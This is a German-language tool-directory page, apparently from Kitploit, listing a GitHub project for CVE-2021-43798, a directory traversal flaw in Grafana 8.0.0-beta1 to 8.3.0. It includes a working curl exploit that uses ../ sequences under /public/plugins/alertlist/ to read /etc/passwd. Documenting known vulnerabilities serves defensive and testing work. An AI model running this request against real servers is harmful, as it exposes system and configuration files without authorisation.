Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-43798 — Von PrivacyHunter | Kitploit
Tools/GitHubGitHub/shoxake17/cve-2021-43798
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubshoxake17/cve-2021-43798

CVE-2021-43798

Von PrivacyHunter

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-43798 by Privacy Hunter

Betroffene Versionen: Grafana 8.0.0-beta1 bis 8.3.0 (gepatchte Versionen ausgenommen)

Schwachstellentyp: Directory Traversal (Verzeichnisdurchquerung)

Auswirkung: Kritisch (Critical)

Plattform: Grafana (Open-Source-Monitoring- und Observability-Plattform)

⚠️ Details der Schwachstelle In Grafana kann über die folgende URL eine Verzeichnisdurchquerung durchgeführt werden:

Code http://<grafana_host>/public/plugins// Dadurch kann ein Angreifer lokale Dateien auf dem Server lesen, z. B. /etc/passwd oder Konfigurationsdateien ohne Berechtigung einsehen.

🔥 Exploit-Beispiel Einfache Anfrage zum Lesen einer Datei:

bash curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd Mit der obigen Anfrage kann die Liste der Benutzer auf einem Linux-System abgerufen werden.

Tool herunterladen